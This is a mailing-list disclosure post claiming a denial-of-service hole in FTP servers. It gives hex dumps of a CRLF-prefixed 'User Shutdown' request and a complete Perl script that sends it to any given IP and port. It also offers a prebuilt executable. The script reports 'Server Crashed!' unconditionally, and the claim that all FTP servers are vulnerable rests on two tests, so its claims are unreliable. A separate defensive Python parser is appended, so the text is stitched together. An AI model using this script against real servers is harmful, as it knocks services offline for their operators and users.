
[Full-Disclosure] FTPServer Denial Of Service Vulnerability



I have found a very serious hole in FTPServer.
The exploit is tested on Cerberus FTP Server 1.71 and on one I coded myself, but I think all FTP servers are vulnerable.
Sorry, but I have too few FTP servers to test.

And this is how it works.
Typical request:
00000000  55 73 65 72 20 53  68 75 74 64 6f 77 6e 0d 0a    User Shutdown..

Exploit request:
00000000  0d 0a 55 73 65 72 20 53  68 75 74 64 6f 77 6e    ..User Shutdown

I've coded an exploit:
See attached file: ftpcrash.exe (zipped) for people who have no Perl

My exploit (in Perl):
[code]
# ftpcrash.pl
print "Exploit for FTP-Server\n";
print "   by The real Remoter\n";
my $usage = "\nftpcrash <IP> <Port>\n";
die "$usage" unless $ARGV[0] && $ARGV[1];
use Socket;
my $remote = $ARGV[0];
my $port = $ARGV[1];
# Build the TCP socket address for the given host and port
my $iaddr = inet_aton($remote);
my $proto = getprotobyname("tcp");
my $paddr = sockaddr_in($port, $iaddr);
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) or die "Can't connect to " . $remote;
print "Sending exploit\n";
# CRLF first, then the command without a terminator (see the second dump above)
my $msg = "\x0d\x0a";
$msg = $msg . "User Shutdown";
send(SOCK,$msg, 0) or die "Can't send Exploit";
sleep(1);
print "Server Crashed!";
sleep(1);
exit;
[/code]

Sorry for my bad English (I'm German)

ftpcrash.zip
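
The post shows the bytes that are sent but not why the servers stop. As an added example (not code from the post or from any of the servers named), here is a control-channel command reader that handles both dumps without dispatching anything unexpected; the class name, the 512-byte cap and the use of reply 500 for an empty line are assumptions.

```python
MAX_LINE = 512  # assumed limit for one command line; not a value from the post


class CommandReader:
    """Splits FTP control-channel bytes into events without trusting framing."""

    def __init__(self, max_line=MAX_LINE):
        self.buf = bytearray()
        self.max_line = max_line

    def feed(self, data):
        """Return one event per complete line now available in the buffer."""
        self.buf += data
        events = []
        while (end := self.buf.find(b"\n")) >= 0:
            line = bytes(self.buf[:end]).rstrip(b"\r")
            del self.buf[:end + 1]
            events.append(self._parse(line))
        if len(self.buf) > self.max_line:
            # Unterminated flood: drop it instead of growing without bound.
            self.buf.clear()
            events.append(("ERR", 500, "line too long"))
        return events

    def _parse(self, line):
        if len(line) > self.max_line:
            return ("ERR", 500, "line too long")
        text = line.decode("ascii", "replace").strip()
        if not text:
            # A bare CRLF, as at the start of the post's second dump.
            return ("ERR", 500, "empty command")
        verb, _, arg = text.partition(" ")
        if not (verb.isalpha() and len(verb) <= 4):
            return ("ERR", 500, "bad verb")
        return ("CMD", verb.upper(), arg)


# The two byte strings shown in the post's hex dumps.
TYPICAL = b"User Shutdown\r\n"
CRLF_FIRST = b"\r\nUser Shutdown"


def demo():
    reader = CommandReader()
    return CommandReader().feed(TYPICAL), reader.feed(CRLF_FIRST), bytes(reader.buf)


if __name__ == "__main__":
    print(demo())
```

With the second input the reader reports the empty line and keeps `User Shutdown` buffered, so nothing is dispatched until a terminator arrives or the connection closes.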